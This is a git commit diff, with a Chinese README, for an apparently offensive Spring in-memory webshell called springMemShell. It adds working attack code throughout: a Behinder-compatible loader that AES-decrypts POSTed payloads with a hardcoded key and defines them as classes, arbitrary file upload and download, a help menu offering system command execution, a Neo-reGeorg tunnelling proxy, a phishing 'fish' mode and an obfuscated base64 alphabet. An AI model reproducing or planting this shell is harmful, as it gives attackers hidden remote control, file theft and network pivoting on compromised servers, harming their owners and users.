ethushiroha
diff --git a/‎.DS_Store‎
0 Bytes b/‎.DS_Store‎
0 Bytes
diff --git a/‎springMemShell/README.md‎
Lines changed: 34 additions & 0 deletions b/‎springMemShell/README.md‎
Lines changed: 34 additions & 0 deletions
diff --git a/‎springMemShell/src/.DS_Store‎
-6 KB b/‎springMemShell/src/.DS_Store‎
-6 KB
diff --git a/‎springMemShell/src/main/.DS_Store‎
-6 KB b/‎springMemShell/src/main/.DS_Store‎
-6 KB
diff --git a/‎springMemShell/src/main/java/com/stdout/Models/BehinderShell.java‎
Lines changed: 46 additions & 0 deletions b/‎springMemShell/src/main/java/com/stdout/Models/BehinderShell.java‎
Lines changed: 46 additions & 0 deletions
diff --git a/‎springMemShell/src/main/java/com/stdout/Models/FileManager.java‎
Lines changed: 57 additions & 2 deletions b/‎springMemShell/src/main/java/com/stdout/Models/FileManager.java‎
Lines changed: 57 additions & 2 deletions
diff --git a/‎springMemShell/src/main/java/com/stdout/Models/Fish.java‎
Lines changed: 1 addition & 1 deletion b/‎springMemShell/src/main/java/com/stdout/Models/Fish.java‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎springMemShell/src/main/java/com/stdout/Models/Helper.java‎
Lines changed: 39 additions & 0 deletions b/‎springMemShell/src/main/java/com/stdout/Models/Helper.java‎
Lines changed: 39 additions & 0 deletions
diff --git a/‎springMemShell/src/main/java/com/stdout/Models/SpringProxy.java‎
Lines changed: 6 additions & 3 deletions b/‎springMemShell/src/main/java/com/stdout/Models/SpringProxy.java‎
Lines changed: 6 additions & 3 deletions
diff --git a/‎springMemShell/src/main/java/com/stdout/Utils/B64.java‎
Lines changed: 4 additions & 1 deletion b/‎springMemShell/src/main/java/com/stdout/Utils/B64.java‎
Lines changed: 4 additions & 1 deletion
@@ -142,3 +142,37 @@ alert(1);
 
 ![image-20210412141215288](https://gitee.com/ethustdout/pics/raw/master/uPic/image-20210412141215288.png)
 
+
+
+## 新功能+4
+
+支持文件上传和下载
+
+### 上传
+
+访问`/?password=stdout&model=file`即可看到文件上传
+
+![image-20210413175757797](https://gitee.com/ethustdout/pics/raw/master/uPic/image-20210413175757797.png)
+
+例如：
+
+-   path： `/tmp/1.js`
+-   file: `Mgo=`
+-   mode: `overwrite`
+
+会把`Mgo=`进行base64解密之后写入`/tmp/1.js`中。
+
+由于文件大小限制，大文件（大于1M）切块之后用append模式进行上传。
+
+
+
+### 下载
+
+`/?password=stdout&model=file&action=download&path=[path]`
+
+就会下载path指向的文件
+
+例如：
+
+-   path=`/tmp/1.js`
+
@@ -0,0 +1,46 @@
+package com.stdout.Models;
+
+import com.stdout.Utils.Redefine.MyReader;
+import com.stdout.Utils.Redefine.MyRequest;
+import com.stdout.Utils.Redefine.MyServletAttributes;
+import com.stdout.Utils.Redefine.MySession;
+
+import javax.crypto.Cipher;
+import javax.crypto.spec.SecretKeySpec;
+
+public class BehinderShell {
+    class U extends ClassLoader {
+        U(ClassLoader c) {
+            super(c);
+        }
+        public Class g(byte []b) {
+            return super.defineClass(b,0,b.length);
+        }
+    }
+
+    public static boolean isStarted = false;
+
+    public void start(Object servlet) throws Exception {
+        Object request = MyServletAttributes.getRequest(servlet);
+
+        if (MyRequest.getMethod(request).equals("POST")) {
+            /*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/
+            String k = "e45e329feb5d925b";
+            Object session = MyRequest.getSession(request);
+            MySession.putValue(session, "u", k);
+            Cipher c = Cipher.getInstance("AES");
+            c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
+            Object reader = MyRequest.getReader(request);
+            new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(MyReader.readline(reader)))).newInstance().equals(servlet);
+        }
+
+    }
+
+    public static void run(Object servlet) throws Exception {
+        if (!BehinderShell.isStarted) {
+            new BehinderShell().start(servlet);
+        }
+    }
+}
+
+
@@ -1,10 +1,65 @@
 package com.stdout.Models;
 
+import com.stdout.Utils.Redefine.*;
+
+import java.io.File;
+import java.io.FileInputStream;
+import java.io.FileOutputStream;
+import java.nio.ByteBuffer;
+import java.util.Base64;
+
 public class FileManager {
-    public static String download(String path) {
-        String result = "";
+    public static void download(Object response, String path) throws Exception {
+        try {
+            MyResponse.setContentType(response, "multipart/form-data");
+            MyResponse.setCharacterEncoding(response, "utf-8");
+            File file = new File(path);
+            String fileName = file.getName();
+            MyResponse.setHeader(response, "Content-Disposition", "attachment;fileName=" + fileName);
+
+            ByteBuffer br = ByteBuffer.allocate(513);
+            FileInputStream f = new FileInputStream(file);
+            int byteRead = f.read(br.array());
+            while (byteRead > 0) {
+                byte[] data = new byte[byteRead];
+                System.arraycopy(br.array(), 0, data, 0, byteRead);
+                Object outputStream = MyResponse.getOutputStream(response);
+                MyServletOutputStream.write(outputStream, data, 0, byteRead);
+                br.clear();
+                byteRead = f.read(br.array());
+            }
+            f.close();
+        } catch (Exception e) {
+            return;
+        }
+    }
 
+    public static String uploadView() throws Exception {
+        String result = MyReader.readSource("upload.html");
 
         return result;
     }
+
+    public static String upload(Object request) throws Exception {
+        String result = "";
+        try {
+            String path = MyRequest.getParameter(request, "path");
+            String file = MyRequest.getParameter(request, "file").replaceAll("\n", "").replaceAll("\r", "");
+            String mode = MyRequest.getParameter(request, "mode");
+            FileOutputStream f;
+            if (mode.equals("append")) {
+                f = new FileOutputStream(path, true);
+            } else {
+                f = new FileOutputStream(path, false);
+            }
+            f.write(Base64.getDecoder().decode(file));
+            f.close();
+            result += "upload success, you file is at ==> " + path;
+        } catch (Exception e) {
+            result += e.getMessage();
+            e.printStackTrace();
+            result += "upload failed, please check the content";
+        }
+        return result;
+    }
 }
@@ -1,6 +1,6 @@
 package com.stdout.Models;
 
-import com.stdout.Utils.MyReader;
+import com.stdout.Utils.Redefine.MyReader;
 
 public class Fish {
     public static boolean isWantFish = false;
 
@@ -0,0 +1,39 @@
+package com.stdout.Models;
+
+public class Helper {
+    public static String help() {
+        String result = "";
+        result += "models: \n";
+
+        result += "\t 1. exec ==> execute system command\n";
+        result += "\t\t param: cmd\n\n";
+
+        result += "\t 2. exit ==> remove the SpringMemShell\n";
+        result += "\t\t param: \n\n";
+
+        result += "\t 3. fish ==> static fish\n";
+        result += "\t\t action ==> start\n";
+        result += "\t\t\t param: target file\n\n";
+        result += "\t\t action ==> stop\n";
+        result += "\t\t\t param: \n\n";
+        result += "\t\t action ==> show\n";
+        result += "\t\t\t param: \n\n";
+
+        result += "\t 4. proxy ==> Neo-reGeorg proxy\n";
+        result += "\t\t param: \n\n";
+
+        result += "\t 5. file ==> file manager\n";
+        result += "\t\t action ==> upload\n" +
+                "<font color='red'>" +
+                    "Notice: upload file is at (use post)password=stdout&model=file" +
+                "</font>";
+        result += "\t\t action ==> download\n";
+        result += "\t\t\t param: path\n\n";
+
+
+
+
+
+        return result;
+    }
+}
@@ -1,6 +1,9 @@
 package com.stdout.Models;
 
-import com.stdout.Utils.*;
+import com.stdout.Utils.Redefine.MyRequest;
+import com.stdout.Utils.Redefine.MyResponse;
+import com.stdout.Utils.Redefine.MyServletInputStream;
+import com.stdout.Utils.Redefine.MySession;
 
 import java.net.InetSocketAddress;
 import java.nio.ByteBuffer;
@@ -10,8 +13,8 @@
 import static com.stdout.Utils.B64.b64en;
 
 public class SpringProxy {
-
-    public void doProxy(Object request, Object response) throws Exception {
+    // usage for Neo-reGeorg
+    public static void doProxy(Object request, Object response) throws Exception {
         MyResponse.resetBuffer(response);
         MyResponse.setStatus(response, 200);
         String cmd = MyRequest.getHeader(request, "Clgpbxohhlnb");
 
@@ -4,6 +4,9 @@
 
 public class B64 {
     private static char[] en = "1nAo76ptVK5Ja/3gSuErjTqQOmkvyY9XGMdRFzCZDUHPl8f2BhIwxciN4L+0bsWe".toCharArray();
+
+    private static byte[] de = new byte[] {-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,58,-1,-1,-1,13,59,0,47,14,56,10,5,4,45,30,-1,-1,-1,-1,-1,-1,-1,2,48,38,40,18,36,32,42,50,11,9,57,33,55,24,43,23,35,16,21,41,8,62,31,29,39,-1,-1,-1,-1,-1,-1,12,60,53,34,63,46,15,49,54,20,26,44,25,1,3,6,22,19,61,7,17,27,51,52,28,37,-1,-1,-1,-1,-1};
+
     public static String b64en(byte[] data) {
         StringBuffer sb = new StringBuffer();
         int len = data.length;
@@ -36,7 +39,7 @@ public static String b64en(byte[] data) {
         }
         return sb.toString();
     }
-    private static byte[] de = new byte[] {-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,58,-1,-1,-1,13,59,0,47,14,56,10,5,4,45,30,-1,-1,-1,-1,-1,-1,-1,2,48,38,40,18,36,32,42,50,11,9,57,33,55,24,43,23,35,16,21,41,8,62,31,29,39,-1,-1,-1,-1,-1,-1,12,60,53,34,63,46,15,49,54,20,26,44,25,1,3,6,22,19,61,7,17,27,51,52,28,37,-1,-1,-1,-1,-1};
+
     public static byte[] b64de(String str) {
         byte[] data = str.getBytes();
         int len = data.length;